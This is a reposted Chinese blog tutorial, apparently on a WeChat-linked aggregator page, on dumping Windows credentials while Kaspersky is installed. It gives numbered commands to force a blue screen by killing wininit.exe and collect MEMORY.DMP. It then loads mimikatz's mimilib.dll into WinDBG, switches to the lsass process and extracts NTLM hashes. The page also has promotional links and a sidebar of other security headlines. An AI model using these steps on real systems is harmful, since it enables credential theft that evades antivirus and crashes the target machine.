服务粉丝

我们一直在努力
当前位置:首页 > 财经 >

通过Windows蓝屏文件来抓密码!

日期: 来源:信安黑客技术收集编辑:

文章作者 :Mr.Wu

原文链接 :

https://www.mrwu.red/web/2000.html

需要的工具:WinDBG+mimilib.dll
测试环境一:win8.1
kaspersky2019(病毒库为2018.10.25号的)

1、首先我用procdump来dump lsass.exe的内存文件2、再用我在https://www.t00ls.net/thread-47663-1-1.html中分享的用sqldump来dump,结局都一样,因为sqldump和procdump的原理都一样下面我们就用Windows蓝屏memory.dmp文件来测试
3、获取蓝屏后的dmp文件,使系统蓝屏的方法有很多,比如说强制结束系统进程,我这里选择强制结束系统进程wininit.exe
管理员权限运行cmd后,执行taskkill /f /im "wininit.exe"4、取回存在于C:\Windows\文件夹下面的MEMORY.DMP文件5、运行windbg,使用Open the crashdump加载MEMORY.DMP

微信搜索公众号:Linux技术迷,回复:linux 领取资料 。6、加载mimikatz的mimilib.dll
.load C:\Users\Administrator\Desktop\qqq\mimilib.dll注意load 前面那个点别漏掉7、设置微软符号服务器(这一步在测试中可有可无)
.SymFix
8、重新加载
.Reload
9、查看lsass.exe进程的内存地址
!process 0 0 lsass.exe
10、切换到lsass.exe进程中
.process /r /p fffffa800e069b0011、运行mimikatz
!mimikatz

=======================
到此装有kaspersky测试机器win8.1的ntml hash 就成功获得

--完--

读到这里说明你喜欢本公众号的文章,欢迎 置顶(标星)本公众号 Linux技术迷,这样就可以第一时间获取推送了~

在本公众号 Linux技术迷,后台回复:Linux,领取2T学习资料 !
1. Linux 中 find 命令的 35 个实际例子
2. 运维必备的《网络端口大全》,看这一份就够了
3. Linux 学习指南 (收藏篇)
4. 2万字系统总结,带你实现Linux命令自由

相关阅读

  • 被盗号后的操作。。。。

  • 作者:Fright一Moch转载自:https://xz.aliyun.com/t/11363#toc-4事件起因一个好兄弟QQ号被盗了,当时给我说让我看一下于是我怀着好奇的心打开网站,不过和官网倒是有几分相似,怪不
  • CVE-2023-0050:GitLab跨站脚本漏洞通告

  • 赶紧点击上方话题进行订阅吧!报告编号:B6-2023-030301报告来源:360CERT报告作者:360CERT更新日期:2023-03-031 漏洞简述2023年03月03日,360CERT监测发现GitLab官方发布了GitLab跨
  • 安全日报(2023.03.03)

  • 赶紧点击上方话题进行订阅吧!报告编号:B6-2023-030399报告来源:360CERT报告作者:360CERT更新日期:2023-03-031 Security Incident|安全事件Microsoft发布针对Intel CPU漏洞的Wind
  • 投资的比较:买房实际也是买股票

  • 我给这篇文加两个副标题:——假如穿越回到1985的话——买房其实也是一种买股票今天有个朋友交流,提出了一个问题:“假如你可以穿越回到1985年,手上有5000元,会怎么用?” 这是一个
  • 3月3日投资提示:金田转债未来6个月不下修

  • 中旗新材:3月3日申购金田转债:未来6个月不下修精锻转债:3月7日上市立高食品:可转债3月7日申购关注集思录微信特别提示本文不构成任何投资建议,仅为信息分享。任何因本文导致的投

热门文章

  • “复活”半年后 京东拍拍二手杀入公益事业

  • 京东拍拍二手“复活”半年后,杀入公益事业,试图让企业捐的赠品、家庭闲置品变成实实在在的“爱心”。 把“闲置品”变爱心 6月12日,“益心一益·守护梦想每一步”2018年四

最新文章

  • 通过Windows蓝屏文件来抓密码!

  • 文章作者 :Mr.Wu原文链接 :https://www.mrwu.red/web/2000.html需要的工具:WinDBG+mimilib.dll测试环境一:win8.1kaspersky2019(病毒库为2018.10.25号的)1、首先我用procdump来d
  • 全局钩子注入--实现获取账号密码

  • 文章来源:None安全团队全局钩子注入-获取QQ密码实现全局钩子注入-获取QQ密码实现 SetWindowsHookExA将应用程序定义的挂钩过程安装到挂钩链中。您将安装一个挂钩程序来监视系
  • 被盗号后的操作。。。。

  • 作者:Fright一Moch转载自:https://xz.aliyun.com/t/11363#toc-4事件起因一个好兄弟QQ号被盗了,当时给我说让我看一下于是我怀着好奇的心打开网站,不过和官网倒是有几分相似,怪不
  • CVE-2023-0050:GitLab跨站脚本漏洞通告

  • 赶紧点击上方话题进行订阅吧!报告编号:B6-2023-030301报告来源:360CERT报告作者:360CERT更新日期:2023-03-031 漏洞简述2023年03月03日,360CERT监测发现GitLab官方发布了GitLab跨
  • 安全日报(2023.03.03)

  • 赶紧点击上方话题进行订阅吧!报告编号:B6-2023-030399报告来源:360CERT报告作者:360CERT更新日期:2023-03-031 Security Incident|安全事件Microsoft发布针对Intel CPU漏洞的Wind
  • 如果“红岸”用了这个装备,“三体”活不过一集

  • 【脑洞时刻,部分虚构】宇宙中的文明有多少?宇宙的边界在哪里?有多少文明在窥视地球?《三体》向我们描绘了一个神秘诡谲的宇宙,讲述宇宙文明间的侵略与防守。人类文明由于存在种种